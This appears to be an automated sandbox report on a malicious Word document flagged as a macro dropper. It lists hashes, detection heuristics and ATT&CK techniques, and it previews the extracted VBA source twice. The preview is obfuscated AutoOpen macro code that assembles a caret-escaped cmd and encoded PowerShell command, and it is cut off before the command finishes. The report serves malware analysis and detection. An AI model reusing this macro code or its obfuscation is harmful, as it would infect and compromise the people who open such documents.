Office (OLE) malware analysis — malicious · 4bfe1a64caabcf58

MALICIOUS

Office (OLE)

91.2 KB Created: 2018-08-17 13:07:00 Authoring application: Microsoft Office Word First seen: 2018-10-07

MD5: 0df8afc062747d46b8036182f8aecf83 SHA-1: 260135b7e16ffd8a38b64fc261eef6afb879bfde SHA-256: 4bfe1a64caabcf58e2e4170e1bbae850c7d7362a877331f1516a5a607bebac0f

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro is obfuscated but appears to construct and execute a command. The ClamAV detection 'Doc.Dropper.Valyria-6666909-0' suggests this file is a dropper. The presence of an AutoOpen macro indicates it is designed to execute automatically upon opening, likely as a spearphishing attachment.

Heuristics 5

ClamAV: Doc.Dropper.Valyria-6666909-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Valyria-6666909-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 43089 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	43089 bytes
SHA-256: `13a8dcdca93bdbfaa00c7f21a796ee379afce2a3f69cd3019a92c2b520e7b797`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "vKSKEZoqA" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "jwLKAtJJfKECO" Function mHCuild() On Error Resume Next VarType 96 wGcQn = Int(759) cPMaKDwhd = "mD" + " " + "/V^" + ":^oN^ " + "^" + " " VarType 7 wGcQn = "ANZHL" UItjOVCLjOv = " /C" + " " + CStr(Chr(lfPXzLnGktbdhw + VFhfbPTT + 34 + azUKDJjNv + BTKrqCHlksBolk)) + " " + " SE^t" + " ^" + " " + "Mz=@o" + "#2/^s^" + ".2l" + "l^" + " (2 ^J^" + "ABQ^A^H" VarType CByte(zjijuQ * AaEGJ * AVMPTp * fOczdG) wGcQn = CDate(3071) wGcQn = "zMZdM" mzjlXZQzUJ = "c^AR" + "^#^A" + "9^" + "AG^4^AZ" + "Q^B^3AC" + "0A^b^" wGcQn = CDbl(5072) wGcQn = Sin(UuWSoV / zZFzJH) JMVTkf = "#B-AGo" + "A^ZQ^" + "B^jA" + "H" + "QAW" + "A^BO^A^" + "G" + "^U^" wGcQn = Hex(697) VarType 18 pCOjHSDOUB = "A" + "dAAu^" + "A" + ")cA^Z^Q" + "B^" + "-^A" + "E^MA^" mHCuild = cPMaKDwhd + UItjOVCLjOv + mzjlXZQzUJ + JMVTkf + pCOjHSDOUB IsArray Atn(362) VarType 3917 End Function Function WQwwrNhiX() On Error Resume Next VarType Sin(FKkrD + sMpNsm * 45992 * FBmmUn) VarType Log(78321 / 94219) IsArray "QDSiHj" HszKuKfdF = "b^AB^@" + "AG" + "^U^Abg" + "^B0A^D^" + "sAJAB" + "^" + "-^A)" + "^Q" + "^Aa^gA" + "^9^AC" + "cA^a" VarType "RAXHf" VarType "FPVmV" XnSwtGoVz = "^" + "A" + "^B^" + "0AH" + "^QAcA" VarType 8742 wGcQn = Tan(PSwAYf - RvECi) XbXzhLw = "A6AC8^A" + "L#^" + "Bu^A" + "^G^U^" + "A^" + "d^#Bz" + "AC4^AZ^" + "A" + "B@A" + "GcAaQ" + "B^" + "%" IsArray 3893 wGcQn = 152103109 cOTtTJWHR = "^" + "AG8^A^" + "b#B/" + "^" + "AC4A^" + "Y^" IsArray 9498 IsArray CCur(8) IsArray CDate(ibhtW + WwrOQz) UZPjdhv = "#^Bv^" + "A^" + "G^0^" + "AL^#^B^" + "PA" + "^E^g" + "^A^" wGcQn = Fix(51321 + 65339 + 37057 * zPYZth) IsArray "omhVh" AjmTniv = "`#^" + "B^sAE^" + "A^A^" + "a^AB^0A" + "H^QAc^" + "A^A^6AC" + "^8^AL^#" + "B^t^A^" + "G^UA^b^" + "g" + "^B0A" + "^G^8A" IsArray "ZcDCjj" IsArray 217 snLDi = "c^g^B" + "^iAH" + "Q^" + "Ac" + "g^B.^A" + "G^'^A" + "^" + "b^gB^@" + "AG^4" + "^" + "A^Z^#^A" + "^" VarType CDate(52112 / owdGL / 5831 - WhToW) VarType "Kujia" zraccGGzh = "uAG" + "^MA^" + "b^#^BtA" + "C^8A^" + "Z" wGcQn = Sqr(qzzsl * viKjt) wGcQn = Cos(tbOZpj * NOHqU) IsArray LCase(8370 * ocMif + BvwbJn * kwQSQ) KzELOjG = "^g" + "B" + "u^" + "A" + "G^W" IsArray Val(kozBtA * afLrL) VarType CCur(24367 / mszkn) IsArray "UYEAbR" MWNiYhOMBc = "^AO^Q^" + "BW^AEg" + "^AQ" + "^A" + "B^o^" VarType CDec(51) wGcQn = Val(1469) VarType LCase(PdEsqD) nqXGjMpAuMl = "AHQ^A" + "d^" + "A^B" + "^#" + "^AD^o^" + "A^L^#^A" + "v^AH" + "^" + "Q^AY^" + "Q^B^" + "0AG'^A^" + "bQA^u" + "A^" WQwwrNhiX = HszKuKfdF + XnSwtGoVz + XbXzhLw + cOTtTJWHR + UZPjdhv + AjmTniv + snLDi + zraccGGzh + KzELOjG + MWNiYhOMBc + nqXGjMpAuMl IsArray CBool(KAmSHC) IsArray Str(362827190) End Function Function ujzovumILfD() On Error Resume Next IsArray "QaJvj" VarType CStr(cBDUF) jVzFWuEQ = "G" + "^M^A^" + "b#B^tAC" + "4AY" + "gB^%^A" + "C^8A" + "^T^g" + "B^6" + "^" + "ADg" + "^A^QA" + "B^o^A" + "H" IsArray "uqlvwZ" VarType 8779 ZnjnRKbo = "Q^A" + "^dA^B" + "#AD" + "o^AL^#" + "Av^" + "A^GcA^Z" + "Q^BvA" + "^G" wGcQn = LCase(4) IsArray "fanbBY" VarType "IZtsj" XGiIHh = "^MAb" + "#^B." + "^" + "AG#ALg" + "B^" + "j" + "A^G^8^" + "A^Lg" + "^B" + "6A" IsArray 60 wGcQn = Int(miADXP) wGcQn = Str(7272) MwnGfv = "^G" + "^EAL" + "^#B`AH" + "^" + "QAR" + "g^B^" IsArray "cYqAA" IsArray CDate(DICznD) pTizTUzcXOs = "SA^G" + "8^AUA^B" + "^A^AGg^" + "Ad^A^" + "B" + "^0^A" wGcQn = 9194 wGcQn = Log(1) IsArray TimeValue(vdWFMa * aShQE) aUzsX = "H^A^A^O" + "^g^Av" + "AC^8A" + "Zg^B#" + "^AHc^" + "AL^gBj^" + "A^G^8" + "^A^bQ^A" + "^" + "u" + "A" VarType 5926 VarType CStr(4791) HhjPazZI = "^" + "G^0A2" + "Q" + "AvAHoA" + "^2QA" + "nAC^4" + "^AU" ujzovumILfD = ... (truncated)

SHA-256: 13a8dcdca93bdbfaa00c7f21a796ee379afce2a3f69cd3019a92c2b520e7b797

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "vKSKEZoqA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "jwLKAtJJfKECO"
Function mHCuild()
On Error Resume Next
VarType 96
   wGcQn = Int(759)
cPMaKDwhd = "mD" + "  " + "/V^" + ":^oN^ " + "^" + " "
VarType 7
   wGcQn = "ANZHL"
UItjOVCLjOv = "  /C" + " " + CStr(Chr(lfPXzLnGktbdhw + VFhfbPTT + 34 + azUKDJjNv + BTKrqCHlksBolk)) + " " + " SE^t" + "   ^" + " " + "Mz=@o" + "#2/^s^" + ".2l" + "l^" + " (2 ^J^" + "ABQ^A^H"
VarType CByte(zjijuQ * AaEGJ * AVMPTp * fOczdG)
   wGcQn = CDate(3071)
   wGcQn = "zMZdM"
mzjlXZQzUJ = "c^AR" + "^#^A" + "9^" + "AG^4^AZ" + "Q^B^3AC" + "0A^b^"
wGcQn = CDbl(5072)
   wGcQn = Sin(UuWSoV / zZFzJH)
JMVTkf = "#B-AGo" + "A^ZQ^" + "B^jA" + "H" + "QAW" + "A^BO^A^" + "G" + "^U^"
wGcQn = Hex(697)
   VarType 18
pCOjHSDOUB = "A" + "dAAu^" + "A" + ")cA^Z^Q" + "B^" + "-^A" + "E^MA^"
mHCuild = cPMaKDwhd + UItjOVCLjOv + mzjlXZQzUJ + JMVTkf + pCOjHSDOUB
   IsArray Atn(362)
   VarType 3917
End Function
Function WQwwrNhiX()
On Error Resume Next
VarType Sin(FKkrD + sMpNsm * 45992 * FBmmUn)
   VarType Log(78321 / 94219)
   IsArray "QDSiHj"
HszKuKfdF = "b^AB^@" + "AG" + "^U^Abg" + "^B0A^D^" + "sAJAB" + "^" + "-^A)" + "^Q" + "^Aa^gA" + "^9^AC" + "cA^a"
VarType "RAXHf"
   VarType "FPVmV"
XnSwtGoVz = "^" + "A" + "^B^" + "0AH" + "^QAcA"
VarType 8742
   wGcQn = Tan(PSwAYf - RvECi)
XbXzhLw = "A6AC8^A" + "L#^" + "Bu^A" + "^G^U^" + "A^" + "d^#Bz" + "AC4^AZ^" + "A" + "B@A" + "GcAaQ" + "B^" + "%"
IsArray 3893
   wGcQn = 152103109
cOTtTJWHR = "^" + "AG8^A^" + "b#B/" + "^" + "AC4A^" + "Y^"
IsArray 9498
   IsArray CCur(8)
   IsArray CDate(ibhtW + WwrOQz)
UZPjdhv = "#^Bv^" + "A^" + "G^0^" + "AL^#^B^" + "PA" + "^E^g" + "^A^"
wGcQn = Fix(51321 + 65339 + 37057 * zPYZth)
   IsArray "omhVh"
AjmTniv = "`#^" + "B^sAE^" + "A^A^" + "a^AB^0A" + "H^QAc^" + "A^A^6AC" + "^8^AL^#" + "B^t^A^" + "G^UA^b^" + "g" + "^B0A" + "^G^8A"
IsArray "ZcDCjj"
   IsArray 217
snLDi = "c^g^B" + "^iAH" + "Q^" + "Ac" + "g^B.^A" + "G^'^A" + "^" + "b^gB^@" + "AG^4" + "^" + "A^Z^#^A" + "^"
VarType CDate(52112 / owdGL / 5831 - WhToW)
   VarType "Kujia"
zraccGGzh = "uAG" + "^MA^" + "b^#^BtA" + "C^8A^" + "Z"
wGcQn = Sqr(qzzsl * viKjt)
   wGcQn = Cos(tbOZpj * NOHqU)
   IsArray LCase(8370 * ocMif + BvwbJn * kwQSQ)
KzELOjG = "^g" + "B" + "u^" + "A" + "G^W"
IsArray Val(kozBtA * afLrL)
   VarType CCur(24367 / mszkn)
   IsArray "UYEAbR"
MWNiYhOMBc = "^AO^Q^" + "BW^AEg" + "^AQ" + "^A" + "B^o^"
VarType CDec(51)
   wGcQn = Val(1469)
   VarType LCase(PdEsqD)
nqXGjMpAuMl = "AHQ^A" + "d^" + "A^B" + "^#" + "^AD^o^" + "A^L^#^A" + "v^AH" + "^" + "Q^AY^" + "Q^B^" + "0AG'^A^" + "bQA^u" + "A^"
WQwwrNhiX = HszKuKfdF + XnSwtGoVz + XbXzhLw + cOTtTJWHR + UZPjdhv + AjmTniv + snLDi + zraccGGzh + KzELOjG + MWNiYhOMBc + nqXGjMpAuMl
   IsArray CBool(KAmSHC)
   IsArray Str(362827190)
End Function
Function ujzovumILfD()
On Error Resume Next
IsArray "QaJvj"
   VarType CStr(cBDUF)
jVzFWuEQ = "G" + "^M^A^" + "b#B^tAC" + "4AY" + "gB^%^A" + "C^8A" + "^T^g" + "B^6" + "^" + "ADg" + "^A^QA" + "B^o^A" + "H"
IsArray "uqlvwZ"
   VarType 8779
ZnjnRKbo = "Q^A" + "^dA^B" + "#AD" + "o^AL^#" + "Av^" + "A^GcA^Z" + "Q^BvA" + "^G"
wGcQn = LCase(4)
   IsArray "fanbBY"
   VarType "IZtsj"
XGiIHh = "^MAb" + "#^B." + "^" + "AG#ALg" + "B^" + "j" + "A^G^8^" + "A^Lg" + "^B" + "6A"
IsArray 60
   wGcQn = Int(miADXP)
   wGcQn = Str(7272)
MwnGfv = "^G" + "^EAL" + "^#B`AH" + "^" + "QAR" + "g^B^"
IsArray "cYqAA"
   IsArray CDate(DICznD)
pTizTUzcXOs = "SA^G" + "8^AUA^B" + "^A^AGg^" + "Ad^A^" + "B" + "^0^A"
wGcQn = 9194
   wGcQn = Log(1)
   IsArray TimeValue(vdWFMa * aShQE)
aUzsX = "H^A^A^O" + "^g^Av" + "AC^8A" + "Zg^B#" + "^AHc^" + "AL^gBj^" + "A^G^8" + "^A^bQ^A" + "^" + "u" + "A"
VarType 5926
   VarType CStr(4791)
HhjPazZI = "^" + "G^0A2" + "Q" + "AvAHoA" + "^2QA" + "nAC^4" + "^AU"
ujzovumILfD = 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.